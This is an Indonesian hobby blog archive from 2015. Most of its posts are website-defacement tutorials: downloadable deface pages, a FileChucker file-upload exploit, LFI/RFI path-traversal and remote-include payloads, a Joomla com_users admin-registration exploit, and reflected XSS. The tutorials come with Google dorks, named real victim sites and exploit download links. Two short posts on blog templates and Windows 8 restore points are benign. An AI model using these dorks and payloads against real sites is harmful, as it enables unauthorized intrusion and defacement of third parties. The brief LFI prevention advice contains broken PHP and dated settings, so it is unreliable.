Rabu, 17 Juni 2015

Script Deface Sederhana by 73_3731 Dot ID

Script Deface Website Sederhana Tapi Keren

Download >>>>>Download<<<<<
Script 1 (dengan lagu Indonesia Raya)
Original by Indonesian Security Tester
Modded by Dimzvers (Saya)
Screenshot




Script 2
Teks Berjalan, Warna Hijau
Original by (Indonesian Stealth Cyber Army)
Modded by (Saya)
Screenshot



Deface Website Dengan Metode Exploit FileChucker

Deface dengan metode Exploit FileChucker

FileChucker merupakan salah satu pluggin wordpress yang memiliki celah file upload. Defacer tanpa login dapat mengupload file ke website target dengan memanfaatkan celah pada plugin ini.
Dork yang dapat digunakan:
inurl:/cgi-bin/filechucker.cgi
intext:Toptown File Upload
inurl:/cgi-bin/filechucker.pl
intext:File Upload by Encodable
Masukkan dorknya ke kotak pencarian google, maka target – target akan muncul seperti dibawah ini.


Saya memilih salah satu target yaitu http://www.bellblue.com/cgi-bin/filechucker.cgi
Lalu setelah dibuka isi semua form yang kosong (diisi asal-asalan juga tidak apa apa)


Lalu pada kolom pilih file, upload script deface anda yang berformat HTML atau txt


Lalu klik Begin Upload, jika upload sukses maka tampilan seperti ini


Untuk melihat filenya masukan URL http://site.com/upload/files/file_mu
Contoh : http://www.bellblue.com/upload/files/dimz.txt/
Bagi yg belum punya download punya saya Di Sini

-Dimzvers-

Teknik Hacking LFI & RFI

Tutorial Singkat LFI & RFI


Sebelumnya apa sih LFI dan RFI itu??


LFI (Local File Inclusion) adalah sebuah lubang pada site di mana attacker bisa mengakses semua file di dalam server dengan hanya melalui URL.
RFI (Remote File Inclusion) adalah sebuah lubang dimana site mengizinkan attacker meng-include-kan file dari luar server.

Penjelasan
fungsi-fungsi yang dapat menyebabkan LFI/RFI:


Code:
include();
include_once();
require();
require_once();

Dengan syarat pada konfigurasi php di server:
allow_url_include = on
allow_url_fopen = on
magic_quotes_gpc = off

contoh:
misalkan kita punya file index.php dengan content kodenya seperti ini,

Code:
<?php
  include "../$_GET[imagefile]";
  ?>

misal $imagefile=image.php
mungkin di url akan terlihat seperti ini bentuknya
Code:
http://www.[target].com/index.php?imagefile=image.php
maka script ini akan menampilkan halaman image.php.


nah disini attacker akan dapat melakukan LFI karena variable imagefile di include begitu saja tanpa menggunakan filter.
misalnya attacker ingin mengakses file passwd yang ada pada server, maka dia akan mencoba memasukan seperti ini ../../../../../../../../../etc/passwd << dengan jumlah "../" itu tergantung dari kedalaman folder tempat file index.php tersebut.. dengan begitu isi file passwd akan ditampilkan di browser. kita bisa menggunakan metode menebak struktur folder dalam website target hahahhh... "The..."

tapi seandainya terdapat error seperti di bawah ini:

Warning: main(../../../../../../../../../etc/passwd.php) [function.main]: failed to open stream: No such file or directory in /their/web/root/index.php on line 2
liat pada passwd ternyata dia ditambah dengan extensi ".php" berarti code yang digunakan untuk include adalah seperti ini
Code:
Code:

  <?php
  include($_GET[imagefile].".php");
  ?>

nah untuk dapat mengelabui script tersebut kita bisa menggunakan (dengan syarat magic_quotes_gpc = off) jadi dibelakang /etc/passwd kita tambahkan seperti

http://www.[target].com/index.php?imagefile=../../../../../../../../../etc/passwd

lalu untuk apa ? yaitu untuk menghilangkan karakter apapun setelah passwd.
* ini disebut null injection.

Nah kita sudah menemukan bug LFI pada website target, sekarang kita coba cari bug RFI dengan menambahkan link file remote (dari luar website) pada variable imagefile. misalnya:

http://www.[target].com/index.php?imagefile=http://www.[remote].com/evil.txt

dengan file evil.txt misal berisi "hacked by n4is3n"

jika ternyata di browser menampilkan kalimat tersebut berarti website tersebut vulner terhadap bug RFI juga.


Pencegahan
Nah sekarang saatnya untuk pencegahan kedua bug tersebut, yaitu
1. Memvalidasi variable.
2. Mengkonfigurasi kembali settingan php pada server website Anda.
allow_url_include = off
allow_url_fopen = off
magic_quotes_gpc = on
3. pada include mungkin bisa ditambahkan "./"
jadinya seperti ini,
Code:
include("./"$_GET[imagefile].".php");

maksudnya dengan seperti itu, saat kita mengakses file dari luar server maka hasilnya akan error karena saat pemrosesan setiap file yang masuk ke variable page akan ditambah ./ di depannya.

http://www.[target].com/index.php?imagefile=http://www.[remote].com/evil.txt

dengan seperti ini server atau website yang diinject akan mencari file http://www.[remote].com/evil.txt dan pastinya akan menyebabkan server menampilkan error bahwa tidak ditemukannya file tersebut.

-Dimzvers-

Deface Web Dengan Teknik com_user atau Exploit Joomla

Deface Dengan Teknik com_user

Teknik com_users ini prinsip kerjanya adalah halaman yang digunakan untuk mendaftar sebagai admin pada situs joomla. Bug com_users banyak ditemukan pada joomla versi 1.6 dan 1.7.
Gunakan dork dibawah ini di google.
· inurl:Home Page Beez5 joomla 1.6 index.php/using-joomla/extensions/components/users-component/registration-form site:br
·         site:com inurl:Home Page Beez joomla 1.6 index.php using-joomla
·         inurl:index.php joomla! 1.7 - open source content management site:
·      inurl:index.php/using-joomla/extension/components/content-component/article-category-list/50-upgraders site:com
·         intext:joomla! 1.7 - open source content management site:jp
·         inurl:index.php/19-sample-data-articles/joomla/50-upgraders site:id
·         inurl:index.php/using-joomla/extensions/templates/beez-2/home-page-beez-2 site:as
·         inurl:index.php/19-sample-data-articles/joomla site:com
Copy dork diatas dan paste di kotak pencarian di google. Cari targetnya sesuai hasil pencarian.
Misal disini saya memakai contoh website http://www.cognobase.com/cms/.
kita buka halaman administratornya untuk mengetahui situs tersebut apakah vuln atau tidak.
Kalau 2 garis dibawah situs saling berdekatan seperti dibawah ini, berarti vuln (memiliki celah com_users)

Sekarang download dulu exploit joomla disinihttp://www.mediafire.com/view/q1zdfkwlez84qwr/Exploit_Joomla.html


Explot: index.php?option=com_users&view=registration
Seperti dibawah ini site_target.com/ index.php?option=com_users&view=registration


Kemudian akan muncul halaman pendaftaran. Kebetulan itu website demonya pake bahasa apa ini gak jelas. Hehe, tapi intinya sama aja.
Setalah muncul halaman pendaftarannya, tekan CTRL + U.


Selanjutnya tekan CTRL + F (untuk mengaktifkan fitur find). Kemudian ketik hidden pada kotak pencarian, klik Next.

Maka hasilnya seperti dibawah ini.
Copy token dan urlnya seperti gambar dibawah ini.


Buka exploit joomla yang kita download tadi. Klik kanan, kemudian pilih Open With, lalu klik Notepad.


Paste URL dan token dari hasil CTRL + U tadi. Kemudian save.


Double klik Exploit Joomla.html yang tadi kita edit. Kemudian terlihat seperti gambar dibawah ini. Edit username, email, dan password sesuai keinginan kita. Lalu klik Register.

Nanti ada tulisan
“Your account has been created and an activation link has been sent to the email address you entered. Note that you must activate the account by clicking on the activation link when you receive the activation email.”

Sekarang buka email agan dan buka link konfirmasinya.
Setalah itu login ke halaman administrator tadi.

Maka hasilnya seperti ini.

Jika sudah masuk ke halaman admin, bebas deh mau diapain websitenya, klo mau deface index atau salah satu halaman web, pilih Article Manager nanti tinggal pilih salah satu artikel lalau ganti deh isinya dengan script Deface anda.
Bagi yg belum punya download punya saya Di Sini

-Dimzvers-

Deface Website Dengan Teknik XSS Vulnerability

Cara Deface dengan teknik XSS

XSS atau kepanjangan dari Cross Site Scripting merupakan teknik Hacking Injeksi Code ( Code Injection Attack ), yaitu seorang attacker menginjeksi atau memasukan kode ke HTML atau JavaScript, DLL selanjutnya akan di eksekusi oleh client.

Dork: inurl:"/showcatrows.php?CategoryID="

Gunakan dork diatas untuk mencari target di google.
Contoh : http://2muchvector.com/showcatrows.php?CategoryID=41

Lalu tambahkan script HTML atau Javascript anda di akhir URL
Contoh <marquee><h1>This Site Has Been Hacked</h1></marquee> lalu tekan enter


-Dimzvers-

Senin, 15 Juni 2015

5 Bahaya Sering Ganti Template Blog

Beberapa Bahaya Yang Harus Anda Perhatikan Jika Sering Ganti template Blog

Bagi seorang blogger, mancari dan mencoba template bagus, keren, untuk blog sendiri memang sering dilakukan tanpa disadari ada beberapa kekurangan yang terjadi pada Blog kita jika sering ganti template. Apa saja hal hal tersebut..?? Mari kita simak..

1. Semua komentar pada posting bisa hilang.
Pada beberapa template, khususnya yang bukan khusus Blogger, tidak menggunakan kontak komentar blogger atau intensedatabase, sehingga pada template baru komentar akan hilang.

2. Traffic Pengunjung Bisa Menurun
Pengunjung yang baru datang mungkin akan terbiasa dengan tampilan baru blog, karena mereka baru melihat blog anda, nahh bagaimana dengan pengunjung yang sudah langganan..?? Mereka pasti bingung dengan menu menu dan tampilan baru blog anda.

3. Blog Bisa Dibanned Oleh Google
Aktifitas mengganti template blogspot yang terlalu sering bisa mengancam eksistensi dari blog yang kita miliki. Hal ini dikarenakan blog yang terlalu sering diganti templatenya berpotensi untuk dibanned oleh Google. Alasan yang menyebabkan munculnya akibat ini juga kurang begitu jelas. Kita dapat menjadikan SPAM sebagai alasan yang membuat Google merasa curiga hingga akhirnya membanned blog milik kita.

4. Kehilangan Pernak Pernik Blog
Misal pada template sebelumnya anda memasang widget atau gadget pihak ketiga atau berformat HTML/Javascript, nah seselasi memasang template baru widget tersebut akan hilang dan anda pun harus menambahkannya kembali.

5. Penyesuaian Dengan Isi Konten Blog Yang Ribet
Bila ganti template pasti kita harus menyesuaikan lagi posisi widget, gadget, posting, label, atau menu menu pada blog kita seperti Link yang terhubung ke sosial media, Fanage Facebook, atau menu lainnya yang sudah tersedia dari template yang terpasang. Belum lagi kita harus mengindeks ulang blog kita ke Google. Ribet kan..??

Nahh maka dari itu pilihlah template yang menurut anda benar benar bagus dan pas dengan isi blog anda..

Cara Membuat System Restore Pada Win8/8.1

Membuat System Restore Manual Pada Win8/8.1

Siang Bloggersszzzz...
Apa kabar bruhh..??
Jumpa lagi di Modder's Blog, kali ini saya akan membagikan sebuah tips untuk membuat manual System Restore atau Restore Point di win8/8.1

Bagi anda pengguna winXP atau 7 pasti gampang banget bikin Restore Point sendiri, tinggal masuk ke Start>All Programs>Accessories>System Tools>Create Restore Point.
Di Windows 8 atau 8.1 caranya jauh berbeda karena System Tools tidak bisa diakses seperti pada win7, nah lalau bagaimana caranya..??

Cukup mudah namun tersembunyi.
Pertama masuk ke 'Charm Bar' klik Settings lalu klik PC Info


Lalu di PC Info Klik System Protection


Lalu klik tombol "Create.."


Lalu isi nama Restore Point yang akan dibuat, misal dengan tanggal, waktu atau bebas


Lalu tunggu hingga selesai, dan Close.



Okehh sekian tips dari saya, semoga membantu ^_^
-Dimzvers-